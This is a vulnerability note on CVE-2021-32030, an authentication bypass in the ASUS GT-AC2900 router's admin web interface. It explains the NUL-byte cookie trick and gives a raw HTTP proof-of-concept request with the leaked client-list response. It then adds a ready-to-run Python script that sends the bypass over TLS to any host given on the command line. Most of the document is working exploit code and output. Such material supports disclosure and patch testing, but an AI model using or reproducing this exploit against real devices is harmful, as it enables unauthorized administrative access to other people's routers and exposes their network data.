1.19 KB / 2021-05-21 09:14:38
# ASUS GT-AC2900 Authentication Bypass (CVE-2021-32030)
The ASUS GT-AC2900 administrative web application is vulnerable to an authentication bypass when it processes remote input from an unauthenticated user. An attacker who can reach the management interface can call administrative CGI handlers without a valid session, gaining unauthorized access to the admin interface.
Affected versions:
* ASUS GT-AC2900 firmware version 9.0.0.4.386.41994 (beta)
* ASUS GT-AC2900 firmware version 3.0.0.4.386.41793 (latest production release at the time)
Detailed analysis: https://github.com/atredispartners/advisories/blob/master/ATREDIS-2020-0010.md
The bypass works by putting a null byte (0x00) at the start of the `asus_token` cookie value. The httpd's `auth_check` handles the token as a C string, so the value is terminated at that first byte and the token is compared as an empty string; as the Atredis advisory describes, that empty string matches a stored token value that is itself empty on a device where the corresponding feature was never configured, and the request is treated as authenticated. The `User-Agent: asusrouter--` header in the PoC is part of the trigger: it makes the httpd apply the app-style, cookie-based token check rather than the browser login flow, so keep it when reproducing.
PoC (the `\0` in the cookie value stands for a single literal 0x00 byte, not the two characters backslash and zero; a proxy or client that escapes or rejects control characters will not reproduce the issue):

Request:

```
GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1
Host: 192.168.1.107:8443
Content-Length: 0
User-Agent: asusrouter--
Connection: close
Referer: https://192.168.1.107:8443/
Cookie: asus_token=\0Invalid; clickedItem_tab=0

```

Response (the device returns its client list although no valid session exists):

```
HTTP/1.0 200 OK
Server: httpd/2.0
Content-Type: application/json;charset=UTF-8
Connection: close

{
"get_cfg_clientlist":[{"alias":"24:4B:FE:64:37:10","model_name":"GT-AC2900","ui_model_name":"GT-AC2900","fwver":"3.0.0.4.386_41793-gdb31cdc","newfwver":"","ip":"192.168.50.1","mac":"24:4B:FE:64:37:10","online":"1","ap2g":"24:4B:FE:64:37:10","ap5g":"24:4B:FE:64:37:14","ap5g1":"","apdwb":"","wired_mac":[
...
...
}
```
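The PoC above is awkward to replay with ordinary tooling because the cookie must carry a real NUL byte, which `requests`, `urllib3` and `http.client` refuse to put in a header value. The following script is an added example, not code from the original note or from the Atredis advisory: it assembles the exact request shown above as raw bytes (with the 0x00 in place), sends it over a TLS socket, and decides whether the device answered with the unauthenticated client list. The default host and port are the lab values from the PoC and are assumptions about your own setup; the response-parsing helpers are kept separate from the network code so they can be exercised offline.

```python
"""Replay the CVE-2021-32030 PoC against an ASUS GT-AC2900 (added example).

The crucial detail is that the asus_token cookie must carry a literal
0x00 byte. High-level HTTP clients reject control characters in header
values, so the request is built by hand and written to a TLS socket.
Host/port default to the lab address used in the PoC; they are assumptions
about the test setup, not values from the advisory.
"""
import json
import socket
import ssl

DEFAULT_HOST = "192.168.1.107"  # lab address from the PoC; change for your target
DEFAULT_PORT = 8443


def build_request(host: str, port: int, hook: str = "get_cfg_clientlist()") -> bytes:
    """Build the raw GET from the PoC, with a real NUL at the start of the token."""
    token = b"\x00Invalid"  # leading NUL: the httpd's C string handling sees ""
    lines = [
        b"GET /appGet.cgi?hook=" + hook.encode() + b" HTTP/1.1",
        b"Host: " + f"{host}:{port}".encode(),
        b"Content-Length: 0",
        b"User-Agent: asusrouter--",  # selects the app-style token check
        b"Connection: close",
        b"Referer: " + f"https://{host}:{port}/".encode(),
        b"Cookie: asus_token=" + token + b"; clickedItem_tab=0",
    ]
    return b"\r\n".join(lines) + b"\r\n\r\n"


def split_response(raw: bytes) -> tuple:
    """Return (status code, body bytes) from a raw HTTP/1.x response."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n", 1)[0]
    status = int(status_line.split()[1])
    return status, body


def is_vulnerable(raw_response: bytes) -> bool:
    """True only when the unauthenticated hook call returned the client list.

    Anything else (non-200 status, a login page, non-JSON, JSON without
    the get_cfg_clientlist key) is reported as not vulnerable.
    """
    status, body = split_response(raw_response)
    if status != 200:
        return False
    try:
        data = json.loads(body.decode("utf-8", "replace"))
    except json.JSONDecodeError:
        return False
    return isinstance(data, dict) and "get_cfg_clientlist" in data


def probe(host: str = DEFAULT_HOST, port: int = DEFAULT_PORT, timeout: float = 5.0) -> bytes:
    """Send the PoC over TLS and return the raw response (needs network access)."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False  # the router presents a self-signed certificate
    ctx.verify_mode = ssl.CERT_NONE
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            tls.sendall(build_request(host, port))
            while True:
                chunk = tls.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
    return b"".join(chunks)


if __name__ == "__main__":
    import sys

    target_host = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_HOST
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else DEFAULT_PORT
    response = probe(target_host, target_port)
    print("vulnerable" if is_vulnerable(response) else "not vulnerable / patched")
```

Run it as `python3 poc.py 192.168.1.107 8443`. If you prefer a proxy, confirm in a hex view that the request on the wire contains the single 0x00 byte after `asus_token=`; if the proxy has replaced it with `\0` or dropped it, the check is not being exercised.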